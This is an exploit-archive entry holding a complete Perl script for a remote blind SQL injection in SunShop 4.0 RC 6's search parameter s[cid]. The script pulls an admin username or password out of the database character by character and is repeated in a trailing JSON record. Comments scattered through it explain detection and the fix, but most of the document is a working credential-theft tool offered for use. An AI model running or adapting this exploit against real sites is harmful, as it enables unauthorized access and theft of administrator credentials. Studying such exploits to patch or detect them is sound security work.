ID 1337DAY-ID-2086
Type zdt
Reporter k1tk4t
Modified 2007-08-25T00:00:00
Description
Exploit for unknown platform in category web applications
============================================================
SunShop 4.0 RC 6 (search) Remote Blind SQL Injection Exploit
============================================================
#!/usr/bin/perl
use LWP::UserAgent;
use Getopt::Long;
# Usage banner. Runs when fewer than two positional arguments (host, path)
# are supplied and exits before any network request is made; the text itself
# names the affected input (the s[cid] parameter of the search script) and
# the vendor's remedy (upgrade to v4.0.1).
if(!$ARGV[1])
{
print "\n \\#'#/ ";
print "\n (-.-) ";
print "\n -----------------oOO---(_)---OOo------------------";
print "\n | SunShop v4.0 RC 6 (search) Blind SQL Injection |";
print "\n | k1tk4t - Indonesia |";
print "\n | coded by DNX |";
print "\n --------------------------------------------------";
print "\n[!] Vendor: http://www.turnkeywebtools.com";
print "\n[!] Bug: in the search script, u can inject sql code in the s[cid] parameter";
print "\n[!] Solution: install v4.0.1";
print "\n[!] Usage: perl sunshop.pl [Host] [Path] <Options>";
print "\n[!] Example: perl sunshop.pl 127.0.0.1 /shop/ -i 1 -c 10 -o 1 -t ss_admins";
print "\n[!] Options:";
print "\n -i [no] Valid User-ID, default is 1";
print "\n -c [no] Valid Category-ID with products, default is 1";
print "\n -o [no] 1 = get username (default)";
print "\n 2 = get password";
print "\n -t [name] Changes the admin table name, default is admins";
print "\n -p [ip:port] Proxy support";
print "\n";
exit;
}
# Positional arguments: target host and the application path. The request
# URL is built as host . path . "index.php?...", so the path must carry its
# own trailing slash (as in the banner's example "/shop/").
my $host = $ARGV[0];
my $path = $ARGV[1];
# Defaults; each may be overridden by the matching switch below.
my $user = 1;               # id of the row read from the admin table (-i)
my $cat = 1;                # category id the injected condition is appended to (-c)
my $column = "username";    # column extracted; -o 2 switches it to "password"
my $table = "admins";       # admin table name (-t)
my %options = ();
# Getopt::Long applies only its own "=i"/"=s" typing; -t and -p are later
# interpolated verbatim into the URL and proxy string, no further validation.
GetOptions(\%options, "i=i", "c=i", "o=i", "t=s", "p=s");
print "[!] Exploiting...\n";
if($options{"i"}) { $user = $options{"i"}; }
if($options{"c"}) { $cat = $options{"c"}; }
if($options{"o"} && $options{"o"} == 2) { $column = "password"; }
if($options{"t"}) { $table = $options{"t"}; }
# syswrite bypasses PerlIO buffering so each recovered character is shown
# as soon as it is found.
syswrite(STDOUT, "data:", 5);
# Character-by-character recovery of positions 1..32 of the selected column
# (presumably sized for a 32-character hash — the script does not say; it
# never stops early, so a shorter value just leaves later positions blank).
# Each position is probed in two passes, digits (ASCII 48..57) then lowercase
# letters (97..122); a position whose character lies outside 0-9a-z produces
# no output. Every candidate is one HTTP request, so a full run issues up to
# 32 * 36 near-identical requests to index.php?l=search_list whose query
# strings differ only in the SUBSTRING offset and CHAR() value — a
# distinctive pattern for access-log and WAF detection.
for(my $i = 1; $i <= 32; $i++)
{
my $found = 0;
my $h = 48;                   # '0'
while(!$found && $h <= 57)    # '9'
{
if(istrue2($host, $path, $table, $user, $i, $h))
{
$found = 1;
syswrite(STDOUT, chr($h), 1);
}
$h++;
}
if(!$found)
{
$h = 97;                      # 'a'
while(!$found && $h <= 122)   # 'z'
{
if(istrue2($host, $path, $table, $user, $i, $h))
{
$found = 1;
syswrite(STDOUT, chr($h), 1);
}
$h++;
}
}
}
print "\n[!] Exploit done\n";
# istrue2 — boolean oracle for a single blind-SQLi probe.
# Arguments (positional): host, path, admin table name, row id, 1-based
# character position, ASCII code of the candidate character. Also reads the
# file-scope $cat, $column and %options directly rather than via arguments.
# Returns 1 when the response body contains "Add To Cart" (the search still
# listed products, i.e. the appended condition held), otherwise 0.
# Defender's view: the payload travels in the s[cid] query parameter as a
# closing parenthesis followed by AND ... /*, i.e. the category filter is
# built unparameterised from an integer-typed input. Casting or whitelisting
# s[cid] as an integer, or using prepared statements, removes the oracle.
sub istrue2
{
# These shadow the file-scope $host/$path/$table and the loop's $i/$h.
my $host = shift;
my $path = shift;
my $table = shift;
my $uid = shift;
my $i = shift;
my $h = shift;
# A fresh UserAgent per probe: no cookies or connection reuse across requests.
my $ua = LWP::UserAgent->new;
my $url = "http://".$host.$path."index.php?l=search_list&s[title]=Y&s[short_desc]=Y&s[full_desc]=Y&s[cid]=".$cat.")%20AND%20SUBSTRING((SELECT%20".$column."%20FROM%20".$table."%20WHERE%20id=".$uid."),".$i.",1)=CHAR(".$h.")/*";
# Optional HTTP proxy from -p, used verbatim as "http://ip:port".
if($options{"p"})
{
$ua->proxy('http', "http://".$options{"p"});
}
my $response = $ua->get($url);
my $content = $response->content;
# Fixed marker string, interpolated as a regex and matched against the whole
# body. An HTTP or connection failure yields LWP's error text instead, which
# will not match, so failures also read as "false" — there is no error path.
my $regexp = "Add To Cart";
if($content =~ /$regexp/)
{
return 1;
}
else
{
return 0;
}
}
# 0day.today [2018-01-05] #
{"published": "2007-08-25T00:00:00", "id": "1337DAY-ID-2086", "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Exploit for unknown platform in category web applications", "enchantments": {"score": {"value": 0.0, "vector": "NONE", "modified": "2018-01-05T19:04:49", "rev": 2}, "dependencies": {"references": [], "modified": "2018-01-05T19:04:49", "rev": 2}, "vulnersScore": 0.0}, "type": "zdt", "lastseen": "2018-01-05T19:04:49", "edition": 2, "title": "SunShop 4.0 RC 6 (search) Remote Blind SQL Injection Exploit", "href": "https://0day.today/exploit/description/2086", "modified": "2007-08-25T00:00:00", "bulletinFamily": "exploit", "viewCount": 16, "cvelist": [], "sourceHref": "https://0day.today/exploit/2086", "references": [], "reporter": "k1tk4t", "sourceData": "============================================================\r\nSunShop 4.0 RC 6 (search) Remote Blind SQL Injection Exploit\r\n============================================================\r\n\r\n\r\n\r\n#!/usr/bin/perl\r\nuse LWP::UserAgent;\r\nuse Getopt::Long;\r\n\r\nif(!$ARGV[1])\r\n{\r\n print \"\\n \\\\#'#/ \";\r\n print \"\\n (-.-) \";\r\n print \"\\n -----------------oOO---(_)---OOo------------------\";\r\n print \"\\n | SunShop v4.0 RC 6 (search) Blind SQL Injection |\";\r\n print \"\\n | k1tk4t - Indonesia |\";\r\n print \"\\n | coded by DNX |\";\r\n print \"\\n --------------------------------------------------\";\r\n print \"\\n[!] Vendor: http://www.turnkeywebtools.com\";\r\n print \"\\n[!] Bug: in the search script, u can inject sql code in the s[cid] parameter\";\r\n print \"\\n[!] Solution: install v4.0.1\";\r\n print \"\\n[!] Usage: perl sunshop.pl [Host] [Path] <Options>\";\r\n print \"\\n[!] Example: perl sunshop.pl 127.0.0.1 /shop/ -i 1 -c 10 -o 1 -t ss_admins\";\r\n print \"\\n[!] 
Options:\";\r\n print \"\\n -i [no] Valid User-ID, default is 1\";\r\n print \"\\n -c [no] Valid Category-ID with products, default is 1\";\r\n print \"\\n -o [no] 1 = get username (default)\";\r\n print \"\\n 2 = get password\";\r\n print \"\\n -t [name] Changes the admin table name, default is admins\";\r\n print \"\\n -p [ip:port] Proxy support\";\r\n print \"\\n\";\r\n exit;\r\n}\r\n\r\nmy $host = $ARGV[0];\r\nmy $path = $ARGV[1];\r\nmy $user = 1;\r\nmy $cat = 1;\r\nmy $column = \"username\";\r\nmy $table = \"admins\";\r\nmy %options = ();\r\nGetOptions(\\%options, \"i=i\", \"c=i\", \"o=i\", \"t=s\", \"p=s\");\r\n\r\nprint \"[!] Exploiting...\\n\";\r\n\r\nif($options{\"i\"}) { $user = $options{\"i\"}; }\r\nif($options{\"c\"}) { $cat = $options{\"c\"}; }\r\nif($options{\"o\"} && $options{\"o\"} == 2) { $column = \"password\"; }\r\nif($options{\"t\"}) { $table = $options{\"t\"}; }\r\n\r\nsyswrite(STDOUT, \"data:\", 5);\r\n\r\nfor(my $i = 1; $i <= 32; $i++)\r\n{\r\n my $found = 0;\r\n my $h = 48;\r\n while(!$found && $h <= 57)\r\n {\r\n if(istrue2($host, $path, $table, $user, $i, $h))\r\n {\r\n $found = 1;\r\n syswrite(STDOUT, chr($h), 1);\r\n }\r\n $h++;\r\n }\r\n if(!$found)\r\n {\r\n $h = 97;\r\n while(!$found && $h <= 122)\r\n {\r\n if(istrue2($host, $path, $table, $user, $i, $h))\r\n {\r\n $found = 1;\r\n syswrite(STDOUT, chr($h), 1);\r\n }\r\n $h++;\r\n }\r\n }\r\n}\r\n\r\nprint \"\\n[!] 
Exploit done\\n\";\r\n\r\nsub istrue2\r\n{\r\n my $host = shift;\r\n my $path = shift;\r\n my $table = shift;\r\n my $uid = shift;\r\n my $i = shift;\r\n my $h = shift;\r\n\r\n my $ua = LWP::UserAgent->new;\r\n my $url = \"http://\".$host.$path.\"index.php?l=search_list&s[title]=Y&s[short_desc]=Y&s[full_desc]=Y&s[cid]=\".$cat.\")%20AND%20SUBSTRING((SELECT%20\".$column.\"%20FROM%20\".$table.\"%20WHERE%20id=\".$uid.\"),\".$i.\",1)=CHAR(\".$h.\")/*\";\r\n\r\n if($options{\"p\"})\r\n {\r\n $ua->proxy('http', \"http://\".$options{\"p\"});\r\n }\r\n\r\n my $response = $ua->get($url);\r\n my $content = $response->content;\r\n my $regexp = \"Add To Cart\";\r\n\r\n if($content =~ /$regexp/)\r\n {\r\n return 1;\r\n }\r\n else\r\n {\r\n return 0;\r\n }\r\n}\r\n\r\n\r\n\n# 0day.today [2018-01-05] #"}
{}